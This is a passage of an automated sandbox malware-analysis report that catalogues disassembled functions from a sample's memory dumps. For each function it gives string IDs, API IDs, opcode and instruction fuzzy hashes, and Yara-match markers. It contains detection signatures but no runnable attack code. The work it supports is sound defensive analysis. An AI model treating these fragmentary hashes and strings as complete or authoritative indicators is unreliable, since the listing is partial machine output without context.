                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: R}$qU/b
                                                                                                          • API String ID: 0-2727322496
                                                                                                          • Opcode ID: 3b055cb3088bf06ffaca91fe3f9f53b74dc382909dfa1dcca4d5a61c669bf767
                                                                                                          • Instruction ID: 073b4ef5f5f4a48f5c3b936deb4ec84fc7db99ac5ecfcb7e14b94107efc6c6d8
                                                                                                          • Opcode Fuzzy Hash: 3b055cb3088bf06ffaca91fe3f9f53b74dc382909dfa1dcca4d5a61c669bf767
                                                                                                          • Instruction Fuzzy Hash: 9161B375E1034EC7DF148E98D8802AEB771FBD4310F25D226EA056F381E7759A808BA0
                                                                                                          Function 0109E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Legacy$UEFI
                                                                                                          • API String ID: 2994545307-634100481
                                                                                                          • Opcode ID: 7c9993a7ae7a0e5c993935785db4d91f0e92189609180c066e3be7ff31618b54
                                                                                                          • Instruction ID: bbb48b4de70e70cf168a3f6bdc54cc8e34c133ce842aa03e3aa6d6ce6081bc0a
                                                                                                          • Opcode Fuzzy Hash: 7c9993a7ae7a0e5c993935785db4d91f0e92189609180c066e3be7ff31618b54
                                                                                                          • Instruction Fuzzy Hash: 9A614971E006199FEB25DFA8C850BAEBBB9FB48740F14406DE689EB291D731AD40DB50
                                                                                                          Function 010C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$MUI
                                                                                                          • API String ID: 0-17815947
                                                                                                          • Opcode ID: 48983292680b177eb19293a3996409ccc8ae1ce47811b3225c26e903298329e0
                                                                                                          • Instruction ID: 79df66843ad1e8f1ea9088b7bf5a1b0a2a83b0e6eadb63248905c52d5ce37859
                                                                                                          • Opcode Fuzzy Hash: 48983292680b177eb19293a3996409ccc8ae1ce47811b3225c26e903298329e0
                                                                                                          • Instruction Fuzzy Hash: CD5117B1E0021DAEDB11DFA9CC90AEEBBBCFB54B54F100529E651F7291D7319A05CBA0
                                                                                                          Function 010204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • kLsE, xrefs: 01020540
                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0102063D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                          • API String ID: 0-2547482624
                                                                                                          • Opcode ID: 7759c84faa74ed76c215c4f45527568725d8ec7b97665086d2c88e20bd37daf7
                                                                                                          • Instruction ID: 37a8afb9ae548fdefdbb31ebbe649fc8cfe086c78c8503d99a35552b526b817e
                                                                                                          • Opcode Fuzzy Hash: 7759c84faa74ed76c215c4f45527568725d8ec7b97665086d2c88e20bd37daf7
                                                                                                          • Instruction Fuzzy Hash: 3551CC716047568BD734EF28C5486A7BBE4AF88304F10883EFAEA87645E770E545CB92
                                                                                                          Function 0102A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0102A309
                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0102A2FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                          • API String ID: 0-2876891731
                                                                                                          • Opcode ID: 3463eda6e005921c14f2111d165ded78482d48cf080ddc3ecb53d525619cfdb2
                                                                                                          • Instruction ID: 8537ce0cab50d4cdd65f2206fa61842405307141e488c80020f22c4be0712823
                                                                                                          • Opcode Fuzzy Hash: 3463eda6e005921c14f2111d165ded78482d48cf080ddc3ecb53d525619cfdb2
                                                                                                          • Instruction Fuzzy Hash: 9B418B30B05669DBDB219F59C884BAE7BF4BF84700F1480A5E9C4DB692EAB5D940CB50
                                                                                                          Function 0105A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                          • Opcode ID: 3b71e89c976cf760f7f2c9f3eacee24fdd775313c2557afb81e44581e73d6314
                                                                                                          • Instruction ID: 8fdc73a1d56d1acc60786e901f884e1889b9c4f64134ebb2c1520ac386a060c7
                                                                                                          • Opcode Fuzzy Hash: 3b71e89c976cf760f7f2c9f3eacee24fdd775313c2557afb81e44581e73d6314
                                                                                                          • Instruction Fuzzy Hash: AD01F4B2240704EFD361DF24CE45F2677E8EB98B15F018A39AA98C7190E3B4D804CB56
                                                                                                          Function 0102C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: MUI
                                                                                                          • API String ID: 0-1339004836
                                                                                                          • Opcode ID: 41c6581c8ad21e1551972738338c516de8fac4165a2cdffea5138833cada7702
                                                                                                          • Instruction ID: c03c067ede9636bcef11253f8459b37accd791685a11070423cbbba43edfb120
                                                                                                          • Opcode Fuzzy Hash: 41c6581c8ad21e1551972738338c516de8fac4165a2cdffea5138833cada7702
                                                                                                          • Instruction Fuzzy Hash: F0826175E002298FEB65CFA9C9807EDBBB5BF48310F1481A9E999AB351DB309D41CF50
                                                                                                          Function 01072F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: P`vRbv
                                                                                                          • API String ID: 0-2392986850
                                                                                                          • Opcode ID: 631ad4723e79e57d9e1778f6e1a3a1083cafea5074da1138fded627e412fdb3d
                                                                                                          • Instruction ID: 95f7168e5b44ac1aea2120fa9e091635d31fb5d2e5251a8fb56c4a3093ca45b3
                                                                                                          • Opcode Fuzzy Hash: 631ad4723e79e57d9e1778f6e1a3a1083cafea5074da1138fded627e412fdb3d
                                                                                                          • Instruction Fuzzy Hash: DF42F471D0425AAAFF69CFACD8546FDBBF1BF05310F14809AE5C1AF280DA349981E758
                                                                                                          Function 010CCD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @
                                                                                                          • API String ID: 0-2766056989
                                                                                                          • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                                                          • Instruction ID: bfbfa98f6e0893e0a1068be0b5a798d10a7dede5332b4f34528129cb5748777b
                                                                                                          • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                                                          • Instruction Fuzzy Hash: 3E622870D012188FCB98DF9AC4D4AADB7B2FF8C311F648199E9816BB45C7356A16CF60
                                                                                                          Function 01042E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 0-4108050209
                                                                                                          • Opcode ID: aedb1d16745b9f3d24ac8dfb31f9756f372425cdae169de0e8879845fc93bd92
                                                                                                          • Instruction ID: fe2dac3535afc9f4005534fac3f430bd0d0d487c6c06331384306c2ee9c268be
                                                                                                          • Opcode Fuzzy Hash: aedb1d16745b9f3d24ac8dfb31f9756f372425cdae169de0e8879845fc93bd92
                                                                                                          • Instruction Fuzzy Hash: 1BF19CB1608352CFDB65CF28C4D0A6ABBE1BF88610F1459BDF9D98B251DB30E845CB52
                                                                                                          Function 00E0666E Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (
                                                                                                          • API String ID: 0-3887548279
                                                                                                          • Opcode ID: 9482cc879a050f99a5ad5edd757a2a854e3d9b45201a62712ae4862735540875
                                                                                                          • Instruction ID: 1cae99e926ed6061b4cccbf029ac85f6e30f6627b1d2f7b10caca81cb42e06ee
                                                                                                          • Opcode Fuzzy Hash: 9482cc879a050f99a5ad5edd757a2a854e3d9b45201a62712ae4862735540875
                                                                                                          • Instruction Fuzzy Hash: 9A021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                          Function 00E06673 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (
                                                                                                          • API String ID: 0-3887548279
                                                                                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                          • Instruction ID: 1a38b3bdfc07d5ccecc4311628de0f4b26e9486c0e7dd35331a0cfcd87c95dcd
                                                                                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                          • Instruction Fuzzy Hash: EB021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                          Function 01022FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PATH
                                                                                                          • API String ID: 0-1036084923
                                                                                                          • Opcode ID: 30e7a43aa1b3f5d8a298204bb8fd0ade75f833871c2cdc2b7ba3955b0b087363
                                                                                                          • Instruction ID: e5fba56389947f2a7d204b9300c8f412f661b80791912d0ec9674be38bc0f61c
                                                                                                          • Opcode Fuzzy Hash: 30e7a43aa1b3f5d8a298204bb8fd0ade75f833871c2cdc2b7ba3955b0b087363
                                                                                                          • Instruction Fuzzy Hash: 25F1B071E10229DBCB29CF98D980AAEFBF5FF4C700F548069E981AB344D7789941CB61
                                                                                                          Function 010AEFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aullrem
                                                                                                          • String ID:
                                                                                                          • API String ID: 3758378126-0
                                                                                                          • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                                                          • Instruction ID: 0137ab8b16371739d80752b21c043efb10a09a889f4f571fd1a7372e202832e6
                                                                                                          • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                                                          • Instruction Fuzzy Hash: F8418E71F0011A9FDF18DFB9C8809AEF7F6FF88310B188279E655E7280D634A9518780
                                                                                                          Function 01020100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          • Opcode ID: 755b60e0c73b520c1501ec3e30fb00cd9cdf685580a837da2a629a5107c0c2e7
                                                                                                          • Instruction ID: 4451346e2684d1acab459ed6eeba5e74cdf1a1f1c5b16001b58778c1886992bd
                                                                                                          • Opcode Fuzzy Hash: 755b60e0c73b520c1501ec3e30fb00cd9cdf685580a837da2a629a5107c0c2e7
                                                                                                          • Instruction Fuzzy Hash: 56A15D71E043796BDF69CA28C840BFF6FE95F55304F0480E9FECAA7285C67499448B64
                                                                                                          Function 010D4420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          • Opcode ID: b040909accb58314e812f4be4f4cdd5f4f825142bf01237c0edda2c326b2d3ea
                                                                                                          • Instruction ID: 989a1bc242b015db2bb6b5427bddd9f023c4f0965ce450d9339f9f8e7d74a501
                                                                                                          • Opcode Fuzzy Hash: b040909accb58314e812f4be4f4cdd5f4f825142bf01237c0edda2c326b2d3ea
                                                                                                          • Instruction Fuzzy Hash: 62A106306043686ADF758E28C844BFD7BE4AF5A754F0844D8BECADBA85CB748944CB50
                                                                                                          Function 010A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          • Opcode ID: 09811f5d865d42c7c5b598aabb1c491e54a03eefe5dc33fbef2cd10352951373
                                                                                                          • Instruction ID: 2b2cf7ac6cd0f2e5174420c96d723c721c38f6a877d5d774b7c120b6a40ffc45
                                                                                                          • Opcode Fuzzy Hash: 09811f5d865d42c7c5b598aabb1c491e54a03eefe5dc33fbef2cd10352951373
                                                                                                          • Instruction Fuzzy Hash: 889162B1A00219AFEB21DF95CD85FEEBBB8EF58750F544065F640AB190D775AD00CBA0
                                                                                                          Function 010CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          • Opcode ID: 83e2526af51390e22332878f7111be6bbf8bc8ff604ce6bf845397bbdc625f39
                                                                                                          • Instruction ID: 817c54943ac6043d4daf68c184421c85576d08f14e5b2b0440e11f29b941324e
                                                                                                          • Opcode Fuzzy Hash: 83e2526af51390e22332878f7111be6bbf8bc8ff604ce6bf845397bbdc625f39
                                                                                                          • Instruction Fuzzy Hash: 29918272900609AFDB22AB95DC84FEFBFBAEF85B50F104029F581A7251D775A901CB50
                                                                                                          Function 0105A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: GlobalTags
                                                                                                          • API String ID: 0-1106856819
                                                                                                          • Opcode ID: a0a7bbd5268dda868512a8dd6a7a35099f81622003ad0990fde80d3f3950b424
                                                                                                          • Instruction ID: 5ad30786bfa380a591aecec02f516f54560d0b96ae335a448af648779a376e3b
                                                                                                          • Opcode Fuzzy Hash: a0a7bbd5268dda868512a8dd6a7a35099f81622003ad0990fde80d3f3950b424
                                                                                                          • Instruction Fuzzy Hash: FC716175E0020ADFDF68CF98D5A06EEBBF1BF48700F14816EE585AB241E7329941DB50
                                                                                                          Function 00DF2CF3 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: gfff
                                                                                                          • API String ID: 0-1553575800
                                                                                                          • Opcode ID: 9d9b21f6ab3127202b6d31f2080ae7f6684d52307d32879254712641912d89a8
                                                                                                          • Instruction ID: 31ac768eaa2f1afeefd576e2f6dfe735c087965211061b065185831457b31843
                                                                                                          • Opcode Fuzzy Hash: 9d9b21f6ab3127202b6d31f2080ae7f6684d52307d32879254712641912d89a8
                                                                                                          • Instruction Fuzzy Hash: 2651D531E0465D4BCB18CE5DD8803FDBBA1EF99300F1981B9EA489F385D6349E458BA0
                                                                                                          Function 00DF2D00 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: gfff
                                                                                                          • API String ID: 0-1553575800
                                                                                                          • Opcode ID: 612c7fc70a98867f5e9d4f4364d64572e0a1b58bb2b8cadffbd65cd1b39eb1ed
                                                                                                          • Instruction ID: 55468d882d65441684343f111ca453022f09e5e55cd0e64971b3231ab0fafb5a
                                                                                                          • Opcode Fuzzy Hash: 612c7fc70a98867f5e9d4f4364d64572e0a1b58bb2b8cadffbd65cd1b39eb1ed
                                                                                                          • Instruction Fuzzy Hash: 6A51E731E0465D4BDB18CA5DDC803FDBBA1EB95300F1981B9EE48DF381D5349E458BA0
                                                                                                          Function 010C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .mui
                                                                                                          • API String ID: 0-1199573805
                                                                                                          • Opcode ID: d764b46b6cdc9a2d9237df26fc534607cc38b3a52cce36913e335509915dd1cd
                                                                                                          • Instruction ID: d33c8578107c0ccf0c97a36ce0faee7fc03e1e1e1ad1234ad21f4ced0752d622
                                                                                                          • Opcode Fuzzy Hash: d764b46b6cdc9a2d9237df26fc534607cc38b3a52cce36913e335509915dd1cd
                                                                                                          • Instruction Fuzzy Hash: 4F518D72D0022ADBDB10DF99C850AEEBBB4BF18E50F05416EEA91FB250D7349801CFA4
                                                                                                          Function 0103E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: EXT-
                                                                                                          • API String ID: 0-1948896318
                                                                                                          • Opcode ID: 65a40036daede7526682a2c21ec9a3472e924eb86befac0455fe039d2f85440b
                                                                                                          • Instruction ID: 4a75edd26c6b6eb4885b1b4aac3d3029916fea561ee380eb41a8fccb58d65487
                                                                                                          • Opcode Fuzzy Hash: 65a40036daede7526682a2c21ec9a3472e924eb86befac0455fe039d2f85440b
                                                                                                          • Instruction Fuzzy Hash: C3418D725083069BD722DA75C980BAFBBECBFC8714F440A69FAC4E7180E774D9048796
                                                                                                          Function 0109C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: BinaryHash
                                                                                                          • API String ID: 0-2202222882
                                                                                                          • Opcode ID: bcc8cd10465381a5c75a9e8d280c29bb663b3572b89c4d91cae373df2b34905e
                                                                                                          • Instruction ID: 2fad0e4201db57f97192566e1ad9acc09bb72a90d574976ddee5d6bcf62efa33
                                                                                                          • Opcode Fuzzy Hash: bcc8cd10465381a5c75a9e8d280c29bb663b3572b89c4d91cae373df2b34905e
                                                                                                          • Instruction Fuzzy Hash: 464142B1D0052DAEEF21DB50CD94FDEB77CAB44714F0045E5AA48AB140DB709E899FA4
                                                                                                          Function 010B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #
                                                                                                          • API String ID: 0-1885708031
                                                                                                          • Opcode ID: 851953735addae23791a6c5ae8b343533766371047a97708908d028667a24ca2
                                                                                                          • Instruction ID: f0b64dc16a114ea129f933020c9448f8d99e6a1ff6bc75330b431f780c03f347
                                                                                                          • Opcode Fuzzy Hash: 851953735addae23791a6c5ae8b343533766371047a97708908d028667a24ca2
                                                                                                          • Instruction Fuzzy Hash: 45311631A0071D9BEB22DB69C890BFEBBF8DF55704F144068E981AB282C776EC45CB54
                                                                                                          Function 0109CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: BinaryName
                                                                                                          • API String ID: 0-215506332
                                                                                                          • Opcode ID: 10ff7962527043baba14f6a90eca2b138a51e12ea34ca705b2e42481996cd8bb
                                                                                                          • Instruction ID: c947214188c0dbbf0cdfa89a91c2497b3322a7c17f7b123010b3cb2e1e29d50d
                                                                                                          • Opcode Fuzzy Hash: 10ff7962527043baba14f6a90eca2b138a51e12ea34ca705b2e42481996cd8bb
                                                                                                          • Instruction Fuzzy Hash: FE310536D00519AFFF15DA58CA61EBFBBB4EB80750F014169A951A7250D7309E00E7E0
                                                                                                          Function 010A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 010A895E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                          • API String ID: 0-702105204
